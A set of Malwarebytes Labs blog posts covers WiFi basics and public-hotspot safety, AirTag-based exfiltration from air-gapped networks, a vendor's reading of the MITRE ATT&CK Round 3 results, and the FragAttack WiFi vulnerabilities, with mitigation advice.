How did WiFi become an official standard?

Until 1997, the world couldn’t quite agree on a common and compatible WiFi standard. Then, a group of industry experts formed a committee to decide. Think of them like the council from Lord of the Rings but tech-savvy and with less pointy ears.

Not only did the committee agree on a wireless communication standard, but it also formed an alliance called the Wireless Ethernet Compatibility Alliance (WECA). In 2002, WECA was rebranded as the WiFi Alliance, which features hundreds of renowned member companies today. Pointy ears still aren’t a requirement for joining.

What is a WiFi hotspot?

A WiFi hotspot is any physical location where a device can connect to the Internet through a Wireless Local Area Network (WLAN). Nowadays, you can easily create a WiFi hotspot with a modern smart device. For example, most smartphones can produce a WiFi hotspot, which effectively turns them into an Internet-connected WiFi router. Any wireless-capable device in range can use it to connect to the Internet (using the phone’s connection to the cellular network) in the same way as they would use an Internet router at home.

When is it safe to use WiFi?

A WiFi connection’s safety depends on its security settings and the source of the WiFi connection. In public, using shared WiFi carries risks (more on that below). If you have to use public WiFi hotspots, it’s wise to also use a VPN to keep your activity private while you use that connection. A VPN wraps your network traffic (including web browsing, email, and other things) in a protective tunnel and makes up for any weaknesses in the hotspot’s encryption.

For home WiFi, here are some tips that can help you improve your network security settings:

  • Update your router’s firmware to the latest version to patch any vulnerabilities.
  • Use a modern router if you can because an old router can be a security risk.
  • Change the default SSID to a different WiFi network name. A hacker can sometimes determine the make and model of your router from the SSID and use the information to exploit known weaknesses and breach your network.
  • Use the latest version of the WiFi Protected Access (WPA) protocol to enhance security. Avoid the Wired Equivalent Privacy (WEP) algorithm because it’s outdated and easy to crack.
  • Enable your router’s and operating system’s respective firewalls to raise a network barrier that monitors traffic.
  • Set a long password for your router and your WiFi network. Always change default passwords.

How can I enhance my WiFi signal?

The strength of your WiFi signal depends on the distance between your router and your device, what’s between them, and other radio interference. Of course, it’s not always possible to keep your device near your router. That’s why it’s a good idea to keep your router in a central location in your home, away from impediments.

You can also purchase a range extender to improve your WiFi signal across your home or buy a more technologically advanced router.

Is it unsafe to use public WiFi connections?

Public WiFi connections are undoubtedly convenient. When you’re on the move, you can connect to the Internet at the airport, shopping mall, café, or restaurant through a public WiFi connection. However, many public networks are left unsecured to make it easy for people to connect. It is also impossible to tell who is operating a hotspot and whether they are benign, malicious, or careless.

Because lots of traffic funnels through them, WiFi hotspots are an ideal place for committing identity theft, financial fraud, and other cybercrimes. Here are some common public WiFi attacks you should watch out for:

  • Person-in-the-middle attack: Hackers intercept communications on a public WiFi network and modify them to steal sensitive data like credit card numbers, emails, messages, pictures, and videos, or to inject malicious code. This attack is also known as a Man-in-the-Middle (MitM) attack.
  • Fraudulent Hotspot: A hacker may create a compromised WiFi network with a plausible name (perhaps the same name as an existing hotspot that’s very popular) to trick users into connecting to the fake network. The hacker can use it to conduct a person-in-the-middle attack, or deploy malicious code like the new AgentTesla variant into the devices connected to the fraudulent hotspot.

How to reduce public WiFi security risks

Although the encryption that is widely used in web browsing and email delivery will help protect you from attacks, it isn’t perfect and isn’t used everywhere. It can be hard to see when it isn’t used, where it’s weak, or where it might be vulnerable to downgrade attacks, particularly in mobile apps, all of which can be exploited by attackers.

You can also use a Virtual Private Network (VPN) to secure your traffic when using public WiFi connections. By wrapping your imperfectly-encrypted traffic in a single, impenetrable tunnel, the best VPN services will keep your data safe from rogue WiFi hotspots and attempts to intercept your communications. You can also read up on VPN protocols to learn about how they secure your connection.

A top VPN service also protects your privacy by cloaking your IP address. Privacy threats can sometimes come from unlikely sources. For example, a Dutch city was recently fined for trailing its citizens with a WiFi tracking system.

Turn WiFi off on your devices when you don’t need it. It’ll make your battery last longer and stop your device being used as a tracking beacon.

The post What does WiFi stand for? appeared first on Malwarebytes Labs.

Using iPhones and AirTags to sneak data out of air-gapped networks

Someone has found an extraordinary way to exfiltrate data by piggybacking data on the backs of unsuspecting iPhones.

Say what?

A researcher has found out that it is possible to upload arbitrary data from non-internet-connected devices by sending Bluetooth Low Energy (BLE) broadcasts to nearby Apple devices that will happily upload the data for you. To demonstrate their point, they released an ESP32 firmware that turns the micro-controller into an (upload only) modem. They also created a macOS application to retrieve, decode and display the uploaded data.

How AirTags are involved

The investigation was triggered by the release of AirTags. AirTags are marketed by Apple as a super-easy way to keep track of your stuff. Basically, you attach an AirTag to your valuables and you can find out where they are using Apple’s Find My app. Unlike a GPS tracker, which requires cell service and can drain batteries quickly, AirTags rely on the popularity of Apple products. The iPhones, iPads, and Macs used by hundreds of millions of people around the world are nodes in a distributed “Find My” network, joined by BLE signals.

Research theory and practice

Building on previous work by TU Darmstadt, the researcher was curious whether Find My’s Offline Finding network could be (ab)used to upload arbitrary data to the Internet from devices that are not connected to Wi-Fi or mobile internet. The data would be broadcast via BLE and hopefully picked up by nearby Apple devices on the Find My network. Then, if those devices were later connected to the Internet, they could forward the data to Apple servers, from where it could be retrieved. In theory, such a technique could be used to avoid the cost and power consumption of mobile Internet access. More interesting from our point of view, it could also be used to exfiltrate data!

Sometimes theoretical ideas like this get shot down by practical issues, like the bandwidth restrictions in the AirTag system, for example. But as it turned out, some security and privacy decisions in the design of the Offline Finding mechanism enabled the goal quite efficiently, and, according to the researcher, make it almost impossible to protect against.

Security through obscurity

The Apple Find My Offline Finding system is designed so that:

  • There are no secrets on the AirTag.
  • There is no access for Apple to the user’s location.
  • Tracking protection against nearby adversaries is achieved by rolling public keys.

The consequence of this for the research lies in the fact that Apple does not know which public keys belong to your AirTag, and therefore which location reports were intended for you. This means that any device with an Apple ID can get location reports from any AirTag. The security solely lies in the encryption of those location reports: The location can only be decrypted with the correct private key, which is on the owner’s device.

Device

Since there is no way for Apple to check what kind of device is sending out the signal, the researcher chose the ESP32 for the sending side, as it is a very common and low-cost microcontroller. Using firmware based on the TU Darmstadt research, the device broadcasts a hardcoded default message and then listens in a loop for new data to broadcast.

Designing a protocol

Making the sender and receiver understand each other took some tinkering. If you are interested in the more technical aspects, I advise you to read the researcher’s post. But the end goal, to set arbitrary bits in the shared key-value store and query them, was reached. Once both the sender and receiver agree on an encoding scheme, it is possible to transfer arbitrary data.
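The general shape of such an encoding scheme can be sketched as follows. This is a hypothetical illustration of bit-level encoding and reassembly, not the researcher's actual protocol; the function names and tuple format are invented for clarity (in the real system each bit would be embedded into a rolling public key broadcast over BLE):

```python
def encode_bits(message: bytes, message_id: int):
    """Yield (message_id, bit_index, bit) tuples, one per broadcast."""
    for i, byte in enumerate(message):
        for j in range(8):
            bit = (byte >> (7 - j)) & 1   # most significant bit first
            yield (message_id, i * 8 + j, bit)

def decode_bits(reports, length: int) -> bytes:
    """Reassemble bytes from retrieved (msg_id, index, bit) reports."""
    bits = {idx: bit for _, idx, bit in reports}
    out = bytearray()
    for i in range(length):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | bits[i * 8 + j]  # rebuild MSB-first
        out.append(byte)
    return bytes(out)

# The "network" here is just a list; in the attack it is Apple's
# Find My key-value store, queried one key at a time.
reports = list(encode_bits(b"hi", message_id=1))
print(decode_bits(reports, 2))  # b'hi'
```

Note how slow this is by design: one bit per broadcast, which matches the researcher's observation that the channel is low-bandwidth but hard to block.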

To send properly authenticated retrieval requests, the researcher used an Apple Mail plugin, a trick that was also described in the German research.

Bridging the air gap

Because devices on the Find My network will cache received broadcasts until they have an Internet connection, this technique can be used to upload data from areas without mobile or Wi-Fi coverage, as long as iPhone owners pass by from time to time. The easiest to imagine use case would be uploading data from remote IoT devices without a broadband modem, SIM card, data plan or Wi-Fi connectivity, but it could also be used in sneakier ways.

In the world of high-security networks, where exotic techniques like blinking server lights and drone cameras are noteworthy techniques for bridging air gaps, visitors’ Apple devices might also be a feasible method for exfiltrating data.

Air-gapped systems were considered the holy grail of security a decade ago. An air-gapped network is one that is physically isolated and not connected to any other network. The idea was that the only way data could be transferred into or out of such a network was by physically inserting some sort of removable media, such as a USB drive or removable disk, or by connecting a transient device like a laptop. Since then, a lot of research has gone into methods of exfiltrating data from air-gapped networks. It seems this researcher has found another one.

Mitigation

As mentioned earlier, it would be hard for Apple to defend against this kind of misuse if they wanted to. Apple designed the system on the principle of data economy. They cannot read unencrypted locations and do not know which public keys belong to your AirTag, or even which public key a certain encrypted location report belongs to (as they only receive the public key’s SHA256 hash).
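The hashing detail mentioned above can be illustrated in a few lines; the key bytes here are a stand-in, not a real Find My key:

```python
import hashlib

# Apple's servers index location reports by the SHA-256 hash of the
# rolling public key, so the server never sees the key itself and
# cannot link reports to a specific AirTag or message.
public_key = bytes(range(28))  # illustrative stand-in for a public key
report_index = hashlib.sha256(public_key).hexdigest()
print(report_index[:16])  # only someone who knows the key can compute this
```

Anyone holding the public key can derive the same index and fetch the matching encrypted reports, which is exactly the property the data-exfiltration trick relies on.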

However, the researcher points out that hardening of the system might be possible in the following two areas:

  • Authentication of the BLE advertisement.
  • Rate limiting of the location report retrieval.

Authentication could be used to exclude anything other than an AirTag from sending data to Finder devices. Rate limiting could enforce the 16-AirTags-per-Apple-ID limit and make abusing the system to send large amounts of data a lot harder.

This technique looks more like interesting research than a pressing, real-world problem and it remains to be seen how seriously Apple treats this threat. In the meantime, the company is well aware that data exfiltration isn’t the only nefarious activity that AirTags can be repurposed for.

The post Using iPhones and AirTags to sneak data out of air-gapped networks appeared first on Malwarebytes Labs.

Why MITRE ATT&CK matters—Choosing alert quality over quantity

Round 3 Carbanak/FIN7 results evaluation

Last month, the researchers at MITRE Engenuity released the results of their most recent ATT&CK Evaluation, offering businesses an opportunity to make informed choices about their own security needs. This year, by modeling the ATT&CK testing after attack methods deployed by the hacker groups Carbanak and FIN7, MITRE Engenuity’s newest evaluation sheds light on how some of the most trusted cybersecurity solutions on the market fare when pitted against some of the most prolific and advanced attacker tactics and techniques to date.

These are the kinds of results that can make any business consider reevaluating its cybersecurity strategy, but before leaping to conclusions, companies should consider whether the results they’re reading are meaningful for their own situations.

For instance, the results are particularly interesting when you put them into the context of real-world environments and experience. It’s critical that organizations without the in-house expertise of a SOC use solutions that are intuitive and effective: a barrage of security alerts can overwhelm, many IT and security teams won’t be able to easily identify the alerts that matter, and the more time they spend in the data weeds, the less time they have to dedicate to growing the business. These organizations also may not be set up to tackle the complex configuration updates some products require to deliver quality results.

Thus, while the ATT&CK Evaluation results do reveal Endpoint Detection and Response (EDR) product scope—revealing how much these products detect in an environment—it is important to also evaluate both the quality (not just the quantity) of that data and how easily the results can be replicated and acted on by your team.

In their article “Winning MITRE ATT&CK, Losing Sight of Customers,” Forrester analysts Jeff Pollard and Allie Mellen explore this exact challenge, noting that “’domination’ of the results does not prove the tool will be effective given your infrastructure, your team, or your business goals,” and that the ATT&CK Evaluation is “focused on the TOOL.”

“It’s NOT focused on the experience,” Pollard and Mellen said. “There are lots of great products poorly deployed, not deployed at all, misconfigured, or lacking the right visibility to be maximally effective.” To put this year’s ATT&CK Evaluation into context for our readers, we are going to listen to the experts—including Pollard and Mellen—and apply the framework created last year by former Forrester analyst Josh Zelonis to evaluate the Round 2 APT29 results (Zelonis has updated his framework for Round 3 in his GitHub repository).

Because of this, the graph we’re going to show you may not look like the graphs you’ve seen across the Internet. We understand that. But we think it is just as important to present you with actionable information delivered out of the box as it is to present you with true information. And, fairly, this applies to all the cybersecurity providers included in this year’s ATT&CK Evaluation.

With that in mind, we will also explain further below how we arrived at the following results:

Combined protection and detection results

Eliminating configuration changes

First, Zelonis’s framework discards mid-test configuration changes that improved detection capabilities.

During the test, vendors may choose to change a standard setting to better detect the attacker technique being tested. These revised configurations are likely not the default settings for customers because they’d result in too many alerts. It’s better not to have a detection rule in place that you know will be noisy, generate false positives, and leave you scratching your head about what really matters in all that signal. Similarly, making these same configuration changes in-house is an unreasonable expectation of many customers. The vendors themselves had a team of experts on hand to review the results, determine the changes to make, and respond.

To map the test results to the needs and knowledge of many customers, we will discard any steps that were detected with a significant configuration change that affects the product’s detection capabilities. Now, we can better compare out-of-the-box product configuration and alert investigation experiences.

Determining alert quality

Alert quality is also critical when you want to quickly determine what you need to investigate and respond to. We suggest you use the following to help interpret the ATT&CK Evaluations results:

Security analytics

In this test detections can be any of the three types of alerts—General, Tactic, and Technique—and there is a hierarchy to these detection types.

Enriched data - Alerts

The highest quality alerts are Techniques. They are where the real detail comes into play—where you know what you are dealing with, the specific steps taken, and what to investigate swiftly. For example, compare the following two alerts:

  1. “A PowerShell script executed”
  2. “T1041 – Exfiltration Over Command and Control Channel”

The latter provides precise, actionable details about what occurred—the theft of data—and how.

The more Techniques in the vendor’s results, the better the analytics capabilities of their EDR product and the swifter the investigation. Thus, we determine the quality of the alerts triggered by an EDR product by dividing the total number of Technique Alerts by the total number of Detections. 

Percentage of actionable alerts to total number of detections

We strongly believe that small IT and security teams should prioritize alert quality over quantity when evaluating an EDR product, while enterprises and MSPs will also benefit from enriching their SOC data with greater context.

Quality rate

EDR vendors should strive for quality alerts out of the box, but they also have to trigger enough quality alerts for IT and security teams to have that all-important level of detail about every action that attackers have taken. To complete this perspective of the data, then, we define Quality Rate by dividing the total number of Technique alerts by the total number of steps during the test. Was there a quality alert for each step?

Percentage of quality alerts
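The two ratios described above can be sketched in a few lines. The counts here are hypothetical placeholders, not any vendor's actual Round 3 numbers:

```python
def alert_quality(technique_alerts: int, total_detections: int) -> float:
    """Share of all detections that are high-detail Technique alerts."""
    return technique_alerts / total_detections

def quality_rate(technique_alerts: int, total_steps: int) -> float:
    """Share of test steps covered by a Technique alert."""
    return technique_alerts / total_steps

# Illustrative counts only (not real evaluation results):
print(round(alert_quality(90, 120), 2))  # 0.75
print(round(quality_rate(90, 174), 2))   # 0.52
```

The first ratio rewards products whose detections are mostly actionable; the second penalizes products that miss steps entirely, even if every alert they do raise is high quality.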

Getting the complete picture

One last consideration is worthwhile. EDR is an essential endpoint security strategy today, but endpoint protection—the prevention side of the story—also plays a critical role, and even more so for those who aren’t looking to hire or invest in an incident response team. Just as reducing the noise helps you zero in on alerts that matter, reducing the attack surface—assessing vulnerabilities and securing weak points in your defenses—helps you limit the threats that get through so you can more easily respond to them.

In the Round 3 evaluation, MITRE Engenuity also assessed protection capabilities. Let’s combine the protection and detection results to get the complete picture:

Combined protection and detection results

When viewed in context, Malwarebytes blocked eight out of 10 attacks on the earlier stages of the attack chain. Malwarebytes is not an EDR-only solution. It is a complete, integrated EP + EDR solution that provides multi-layered defense-in-depth for all types of modern cyberattacks, while remaining easy to use out of the box by organizations of all sizes.

We share this information to inform. Companies deserve to know exactly what they are buying when they purchase a cybersecurity solution, and they deserve to know how those solutions are tested—that includes the conditions, the circumstances, and the real-world applications of those tests.

At Malwarebytes we must be realistic about those real-world applications. For many businesses, cybersecurity is a set-it-and-forget-it product, and in-house SOCs and internal teams that can routinely adjust alert settings are luxuries. That’s just a fact, and it does not matter whether the cybersecurity industry likes or doesn’t like that fact—what matters is whether cybersecurity vendors are willing to honestly support their customers’ needs.

The post Why MITRE ATT&CK matters—Choosing alert quality over quantity appeared first on Malwarebytes Labs.

FragAttack: New Wi-Fi vulnerabilities that affect… basically everything

A new set of vulnerabilities with an aggressive name and their own website almost always bodes ill. The name FragAttack is a contraction of fragmentation and aggregation attacks, which immediately indicates the main area where the vulnerabilities were found.

The vulnerabilities are mostly in how Wi-Fi and connected devices handle data packets, and more particularly in how they handle fragments and frames of data packets. As far as the researcher is aware, every Wi-Fi product is affected by at least one vulnerability.

The research

The researcher who uncovered the Wi-Fi vulnerabilities, some of which have existed since 1997, is Mathy Vanhoef. The vulnerabilities he discovered affect all modern Wi-Fi security protocols, including the latest WPA3 specification. You may remember Vanhoef as one of the researchers behind the KRACK attacks against weaknesses in the WPA2 protocol. As Vanhoef puts it:

“it stays important to analyze even the most well-known security. Additionally, it shows that it’s essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them.”

Packet fragmentation

Every network imposes a maximum size on the chunks of data that can be transmitted at the network layer, called the MTU (Maximum Transmission Unit). Packets can often be larger than this maximum size, so to fit inside the MTU limit each packet can be divided into smaller pieces of data, called fragments. These fragments are later reassembled to reconstruct the original message.

Wi-Fi networks can use this packet fragmentation to improve throughput. By fragmenting data packets and sending more, but shorter frames, each transmission will have a lower probability of collision with another packet. So, if the content of a message is too large to fit inside a single packet, the content is spread across several fragments, each with its own header.
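The fragmentation-and-reassembly idea can be sketched as follows. This is a simplified illustration, not the 802.11 frame format; the MTU value is arbitrary:

```python
MTU = 16  # bytes per fragment; hypothetical link limit

def fragment(payload: bytes, mtu: int = MTU):
    """Split a payload into (sequence_number, chunk) fragments."""
    return [(i, payload[off:off + mtu])
            for i, off in enumerate(range(0, len(payload), mtu))]

def reassemble(fragments) -> bytes:
    """Rebuild the original payload from possibly out-of-order fragments."""
    return b"".join(chunk for _, chunk in sorted(fragments))

msg = b"a payload that is larger than one MTU-sized frame"
frags = fragment(msg)
assert all(len(chunk) <= MTU for _, chunk in frags)
print(reassemble(reversed(frags)) == msg)  # True
```

The FragAttack design flaws live precisely in this reassembly step: a real 802.11 receiver should also verify that all fragments of a frame were encrypted under the same key and clear stale fragments on reconnection, which this naive sketch (like some vulnerable devices) does not.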

Just like packets, frames are small parts of a message in the network. A frame helps to identify data and determine the way it should be decoded and interpreted. The main difference between a packet and a frame is their association with the OSI layers: a packet is the unit of data used at the network layer, while a frame is the unit of data used at the data link layer, one layer below it in the OSI model. A frame contains more information about the transmitted message than a packet.

The vulnerabilities

The researcher found several implementation flaws that can be abused to easily inject frames into a protected Wi-Fi network. These vulnerabilities can be grouped as follows:

Device-specific flaws

  • Some Wi-Fi devices accept any unencrypted frame even when connected to a protected Wi-Fi network.
  • Certain devices accept plaintext aggregated frames that look like handshake messages.
  • Worse than those, some devices accept broadcast fragments even when sent unencrypted.

Design flaws in the Wi-Fi features that handle frames

  • The frame aggregation feature of Wi-Fi uses an “is aggregated” flag that is not authenticated and can be modified by an adversary.
  • Another design flaw is in the frame fragmentation feature of Wi-Fi. Receivers are not required to check whether every fragment that belongs to the same frame is encrypted with the same key and will reassemble fragments that were decrypted using different keys.
  • The third design flaw is also in Wi-Fi’s frame fragmentation feature. When a client disconnects from the network, the Wi-Fi device is not required to remove non-reassembled fragments from memory.

There are also a few other implementation vulnerabilities that can be used to escalate the flaws mentioned above.

CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Although each affected codebase normally receives a unique CVE, the agreement between affected vendors was that, in this specific case, using the same CVE across different codebases would make communication easier.

The design flaws were assigned the following CVEs:

  • CVE-2020-24588: Aggregation attack (accepting non-SPP A-MSDU frames).
  • CVE-2020-24587: Mixed key attack (reassembling fragments encrypted under different keys).
  • CVE-2020-24586: Fragment cache attack (not clearing fragments from memory when (re)connecting to a network).

Implementation vulnerabilities that allow the trivial injection of plaintext frames in a protected Wi-Fi network were assigned these CVEs:

  • CVE-2020-26145: Samsung Galaxy S3 accepting plaintext broadcast fragments as full frames (in an encrypted network).
  • CVE-2020-26144: Samsung Galaxy S3 accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network).
  • CVE-2020-26140: Alfa Windows 10 driver for AWUS036H accepting plaintext data frames in a protected network.
  • CVE-2020-26143: Alfa Windows 10 driver 1030.36.604 for AWUS036ACH accepting fragmented plaintext data frames in a protected network.

Other implementation flaws are assigned the following CVEs:

  • CVE-2020-26139: NetBSD forwarding EAPOL frames even though the sender is not yet authenticated.
  • CVE-2020-26146: Samsung Galaxy S3 reassembling encrypted fragments with non-consecutive packet numbers.
  • CVE-2020-26147: Linux kernel 5.8.9 reassembling mixed encrypted/plaintext fragments.
  • CVE-2020-26142: OpenBSD 6.6 kernel processing fragmented frames as full frames.
  • CVE-2020-26141: ALFA Windows 10 driver for AWUS036H not verifying the TKIP MIC of fragmented frames.

Vulnerable devices

On the dedicated site the researcher states that

“experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities.”

The statement is based on testing more than 75 devices, which showed they were all vulnerable to one or more of the discovered attacks.

Mitigation

To mitigate attacks where your router’s NAT/firewall is bypassed and devices are attacked directly, you must ensure that all your devices are updated. Unfortunately, not all products get regular updates.

Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router’s NAT/firewall to directly attack devices.

The impact of attacks can also be reduced by manually configuring your DNS server so that it cannot be poisoned.
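As a hedged example of that last point: on a Linux system that uses NetworkManager, you can pin your DNS servers so the resolver ignores whatever the (potentially spoofed) network hands out via DHCP. The connection name "MyWifi" and the Quad9 resolver addresses below are assumptions; substitute your own connection name (see `nmcli connection show`) and preferred resolvers.

```shell
# Pin DNS servers for the connection "MyWifi" (name is an assumption)
# and ignore DNS servers offered by DHCP on that network.
nmcli connection modify "MyWifi" ipv4.dns "9.9.9.9 149.112.112.112" \
    ipv4.ignore-auto-dns yes

# Re-activate the connection so the change takes effect.
nmcli connection up "MyWifi"
```

This is a configuration sketch, not a complete defense: it only closes off the DNS poisoning avenue, not the frame injection itself.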

How serious are these vulnerabilities?

We have been here before. When the KRACK vulnerabilities were revealed a few years ago, some people treated them as the end of Wi-Fi. You’ll have noticed they weren’t. That doesn’t mean they were nothing, either, but a little perspective goes a long way.

The CVEs registered for the FragAttacks have been given a medium severity rating, with CVSS scores between 4.8 and 6.5. That indicates that anything resembling remote control is probably too difficult to achieve to be attractive to attackers. The data-stealing options, however, are more realistic and could well be used in targeted attacks.

Proof is in the pudding

If you are interested, you can find a demo and a link to a testing tool on the dedicated website. You can also find some FAQs and a pre-recorded presentation made for USENIX Security about these vulnerabilities.

Stay safe, everyone!

The post FragAttack: New Wi-Fi vulnerabilities that affect… basically everything appeared first on Malwarebytes Labs.